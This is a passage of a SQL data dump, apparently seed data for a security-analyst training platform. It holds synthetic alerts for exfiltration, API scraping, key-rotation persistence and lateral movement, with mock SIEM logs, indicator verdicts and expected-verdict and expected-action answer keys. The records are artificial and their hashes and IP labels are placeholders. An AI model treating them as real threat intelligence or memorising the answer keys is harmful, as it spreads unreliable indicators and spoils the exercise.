x64)\\\",\\\"session_id\\\":\\\"abc123xyz\\\",\\\"external_references\\\":[\\\"https://threatintel.report/apt29\\\"]}}\"},{\"timestamp\":\"2026-02-01T20:29:22.716Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"lateral_movement\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"user\\\":\\\"jdoe\\\",\\\"target_accounts\\\":[\\\"journalist1@news.com\\\",\\\"editor@media.org\\\"],\\\"malware_filename\\\":\\\"APT29_toolkit.exe\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"success\\\",\\\"extra_info\\\":{\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"session_id\\\":\\\"abc123xyz\\\",\\\"external_references\\\":[\\\"https://threatintel.report/apt29\\\"]}}\"},{\"timestamp\":\"2026-02-01T20:28:22.716Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"lateral_movement\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"user\\\":\\\"jdoe\\\",\\\"target_accounts\\\":[\\\"journalist1@news.com\\\",\\\"editor@media.org\\\"],\\\"malware_filename\\\":\\\"APT29_toolkit.exe\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"success\\\",\\\"extra_info\\\":{\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"session_id\\\":\\\"abc123xyz\\\",\\\"external_references\\\":[\\\"https://threatintel.report/apt29\\\"]}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1018, 'Massive Data Exfiltration', 'critical', 'Data Loss Prevention (DLP) Systems', 'Sensitive information has been exfiltrated from several compromised accounts, marking the final and most damaging stage of the breach.', 'Exfiltration', 'T1020: Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"event_id\":\"DLP-EXFIL-20231015-0005\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.150\",\"username\":\"jdoe\",\"filename\":\"sensitive_data.zip\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"action\":\"exfiltration\",\"protocol\":\"HTTPS\",\"bytes_transferred\":10485760,\"external_attacker_ip\":\"203.0.113.150\"}', '2026-01-17 03:50:17', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within corporate network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"suspicious\",\"details\":\"Account involved in unauthorized data exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"sensitive_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive corporate data.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"suspicious\",\"details\":\"Hash of a file involved in data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.718Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015-0005\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.150\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"sensitive_data.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":10485760,\\\"external_attacker_ip\\\":\\\"203.0.113.150\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.718Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015-0005\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.150\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"sensitive_data.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":10485760,\\\"external_attacker_ip\\\":\\\"203.0.113.150\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.718Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015-0005\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.150\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"sensitive_data.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":10485760,\\\"external_attacker_ip\\\":\\\"203.0.113.150\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.718Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015-0005\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.150\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"sensitive_data.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":10485760,\\\"external_attacker_ip\\\":\\\"203.0.113.150\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.718Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:10Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015-0005\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.150\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"sensitive_data.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":10485760,\\\"external_attacker_ip\\\":\\\"203.0.113.150\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1019, 'Unauthorized API Access Detected', 'medium', 'LinkedIn API logs', 'Data Brokers initiated their operation by exploiting LinkedIn\'s API, making unauthorized requests to scrape profile data. The operation was detected due to unusual patterns of API calls originating from external IPs associated with known malicious activities.', 'API Abuse', 'T1190 - Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:35:47Z\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"api_key\":\"12345-abcde-67890-fghij\",\"username\":\"data_broker_01\",\"requested_endpoint\":\"/v2/profile/scrape\",\"request_method\":\"GET\",\"response_status\":403,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-17 03:50:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous scraping activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host communicating with external attacker.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"data_broker_01\",\"is_critical\":true,\"osint_result\":{\"source\":\"LinkedIn API Logs\",\"verdict\":\"suspicious\",\"details\":\"Username used in unauthorized API access attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"clean\",\"details\":\"Hash not associated with known malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.720Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:47Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"api_key\\\":\\\"12345-abcde-67890-fghij\\\",\\\"username\\\":\\\"data_broker_01\\\",\\\"requested_endpoint\\\":\\\"/v2/profile/scrape\\\",\\\"request_method\\\":\\\"GET\\\",\\\"response_status\\\":403,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.720Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:47Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"api_key\\\":\\\"12345-abcde-67890-fghij\\\",\\\"username\\\":\\\"data_broker_01\\\",\\\"requested_endpoint\\\":\\\"/v2/profile/scrape\\\",\\\"request_method\\\":\\\"GET\\\",\\\"response_status\\\":403,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.720Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:47Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"api_key\\\":\\\"12345-abcde-67890-fghij\\\",\\\"username\\\":\\\"data_broker_01\\\",\\\"requested_endpoint\\\":\\\"/v2/profile/scrape\\\",\\\"request_method\\\":\\\"GET\\\",\\\"response_status\\\":403,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.720Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:47Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"api_key\\\":\\\"12345-abcde-67890-fghij\\\",\\\"username\\\":\\\"data_broker_01\\\",\\\"requested_endpoint\\\":\\\"/v2/profile/scrape\\\",\\\"request_method\\\":\\\"GET\\\",\\\"response_status\\\":403,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.720Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:47Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"api_key\\\":\\\"12345-abcde-67890-fghij\\\",\\\"username\\\":\\\"data_broker_01\\\",\\\"requested_endpoint\\\":\\\"/v2/profile/scrape\\\",\\\"request_method\\\":\\\"GET\\\",\\\"response_status\\\":403,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1020, 'Unusual Data Extraction Patterns', 'high', 'Network traffic analysis', 'Abnormal data extraction patterns detected, indicating potential scraping of LinkedIn profiles.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"185.199.108.153\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\",\"request_uri\":\"https://www.linkedin.com/profile/view?id=123456789\",\"request_method\":\"GET\",\"response_status\":\"200\",\"bytes_transferred\":10485760,\"username\":\"j.doe\",\"malicious_pattern_detected\":true}', '2026-01-17 03:50:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal employee workstation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"suspicious\",\"details\":\"Known to host suspicious activity related to data scraping.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://www.linkedin.com/profile/view?id=123456789\",\"is_critical\":false,\"osint_result\":{\"source\":\"LinkedIn\",\"verdict\":\"clean\",\"details\":\"Legitimate LinkedIn profile URL.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"John Doe, employee in sales department.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1021, 'Persistence Through API Key Rotation', 'medium', 'Access management logs', 'An unauthorized API key rotation was detected from a known malicious IP address, indicating an attempt to maintain persistent access.', 'Persistence Technique', 'T1098 - Account Manipulation', 1, 'new', NULL, '{\"event_time\":\"2023-10-10T14:32:07Z\",\"user\":\"malicious_actor\",\"source_ip\":\"203.0.113.45\",\"action\":\"api_key_rotation\",\"old_api_key\":\"abc123xyz456def789ghi012jkl345mn\",\"new_api_key\":\"def789ghi012jkl345mnabc123xyz456\",\"api_call\":\"/v1/key/rotate\",\"status\":\"success\",\"internal_ip\":\"192.168.1.25\"}', '2026-01-17 03:50:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"malicious_actor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"malicious\",\"details\":\"User associated with unauthorized actions\"}},{\"id\":\"artifact_3\",\"type\":\"internal_ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised host\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-10T14:32:07Z\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"api_key_rotation\\\",\\\"old_api_key\\\":\\\"abc123xyz456def789ghi012jkl345mn\\\",\\\"new_api_key\\\":\\\"def789ghi012jkl345mnabc123xyz456\\\",\\\"api_call\\\":\\\"/v1/key/rotate\\\",\\\"status\\\":\\\"success\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-10T14:32:07Z\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"api_key_rotation\\\",\\\"old_api_key\\\":\\\"abc123xyz456def789ghi012jkl345mn\\\",\\\"new_api_key\\\":\\\"def789ghi012jkl345mnabc123xyz456\\\",\\\"api_call\\\":\\\"/v1/key/rotate\\\",\\\"status\\\":\\\"success\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-10T14:32:07Z\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"api_key_rotation\\\",\\\"old_api_key\\\":\\\"abc123xyz456def789ghi012jkl345mn\\\",\\\"new_api_key\\\":\\\"def789ghi012jkl345mnabc123xyz456\\\",\\\"api_call\\\":\\\"/v1/key/rotate\\\",\\\"status\\\":\\\"success\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-10T14:32:07Z\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"api_key_rotation\\\",\\\"old_api_key\\\":\\\"abc123xyz456def789ghi012jkl345mn\\\",\\\"new_api_key\\\":\\\"def789ghi012jkl345mnabc123xyz456\\\",\\\"api_call\\\":\\\"/v1/key/rotate\\\",\\\"status\\\":\\\"success\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-10T14:32:07Z\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"api_key_rotation\\\",\\\"old_api_key\\\":\\\"abc123xyz456def789ghi012jkl345mn\\\",\\\"new_api_key\\\":\\\"def789ghi012jkl345mnabc123xyz456\\\",\\\"api_call\\\":\\\"/v1/key/rotate\\\",\\\"status\\\":\\\"success\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1022, 'Lateral Movement to Additional Data Sources', 'high', 'Cross-platform access logs', 'The threat actor has moved laterally to access additional public databases, attempting to expand their data collection efforts. The observed activity involves accessing internal resources using compromised credentials and pivoting to external databases.', 'Lateral Movement', 'T1563.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.103\",\"internal_user\":\"jdoe\",\"accessed_resource\":\"PublicDatabaseServer\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"data_collector.exe\",\"action\":\"AccessGranted\",\"log_id\":\"ab12cd34ef56gh78ij90klmnopqr\"}', '2026-01-17 03:50:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.103\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Corporate asset in database subnet.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"HR Records\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Hash recognized as part of a data collection tool used by APTs.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"data_collector.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal File Catalog\",\"verdict\":\"suspicious\",\"details\":\"Executable not usually found on corporate systems.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.724Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.103\\\",\\\"internal_user\\\":\\\"jdoe\\\",\\\"accessed_resource\\\":\\\"PublicDatabaseServer\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"data_collector.exe\\\",\\\"action\\\":\\\"AccessGranted\\\",\\\"log_id\\\":\\\"ab12cd34ef56gh78ij90klmnopqr\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.724Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.103\\\",\\\"internal_user\\\":\\\"jdoe\\\",\\\"accessed_resource\\\":\\\"PublicDatabaseServer\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"data_collector.exe\\\",\\\"action\\\":\\\"AccessGranted\\\",\\\"log_id\\\":\\\"ab12cd34ef56gh78ij90klmnopqr\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.724Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.103\\\",\\\"internal_user\\\":\\\"jdoe\\\",\\\"accessed_resource\\\":\\\"PublicDatabaseServer\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"data_collector.exe\\\",\\\"action\\\":\\\"AccessGranted\\\",\\\"log_id\\\":\\\"ab12cd34ef56gh78ij90klmnopqr\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.724Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 